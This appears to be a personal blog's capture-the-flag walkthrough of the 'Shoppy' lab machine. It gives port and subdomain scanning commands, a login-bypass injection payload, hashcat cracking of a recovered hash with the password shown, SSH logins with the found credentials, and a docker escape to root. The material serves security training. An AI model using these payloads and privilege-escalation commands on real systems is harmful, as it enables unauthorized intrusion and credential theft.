CTF Choppy

CTF Linux
Created At :
Count:435 Views 👀 :23
  1. Rustscan
  2. /etc/hosts
  3. Port 80
    1. Subdomain listing
    2. Gobuster
    3. Login page
    4. Bypass auth login page
    5. Searsh for user
    6. Crack the password
  4. Mattermost
  5. jaeger
  6. deploy

Rustscan

rustscan -a 10.10.11.180
language-bashCopy

Output:

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
9093/tcp open  copycat syn-ack
language-textCopy

/etc/hosts

echo "10.10.11.180 shoppy.htb" >> /etc/hosts
language-bashCopy

Port 80

Subdomain listing

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hw 9000 --sc 200 
language-bashCopy

Add mattermost.shoppy.htb to /etc/hosts

Gobuster

gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard switch
language-bashCopy

Output:

/images               (Status: 301) [Size: 179] [--> /images/]
/login                (Status: 200) [Size: 1074]              
/admin                (Status: 302) [Size: 28] [--> /login]   
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/Login                (Status: 200) [Size: 1074]              
/js                   (Status: 301) [Size: 171] [--> /js/]    
/fonts                (Status: 301) [Size: 177] [--> /fonts/] 
/Admin                (Status: 302) [Size: 28] [--> /login]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/LogIn                (Status: 200) [Size: 1074]               
/LOGIN                (Status: 200) [Size: 1074]         
language-textCopy

Login page

http://shoppy.htb/login

You can bypass the login page
I will use burpsuite to intercept the trafic.

While I was playing with burpsuite I go an interesting error:

We have an username jaeger.
/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js

Bypass auth login page

When I put a ‘ the page take more time to load.
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
I from this liste I took this '||'2 and add admin at the beggining.

Searsh for user

I have to search for a user, it’s not working with jaeger.

I enter '||'2 to find a new user, josh.

Crack the password

This is a hash, probably MD5.
6ebcea65320589ca4f2f1ce039975995
https://www.dcode.fr/cipher-identifier 

echo "6ebcea65320589ca4f2f1ce039975995" > hash      
hashcat -m 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt
language-bashCopy

remembermethisway

Mattermost

http://mattermost.shoppy.htb/login

jaeger is a linux user, I saw him in the error with burpsuite.
Let’s use ssh.

jaeger

ssh jaeger@shoppy.htb
language-bashCopy

sudo -l 

sudo -u deploy /home/deploy/password-manager
language-bashCopy

I don’t have the password, if I use strings I see nothing but with cat it’s working.

Sample

deploy

ssh deploy@shoppy.htb
language-bashCopy

Deploying@pp!
I’m using lse again.

I can use docker, I can also exploit it with GTFOBins.
https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
language-bashCopy

I’m root

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme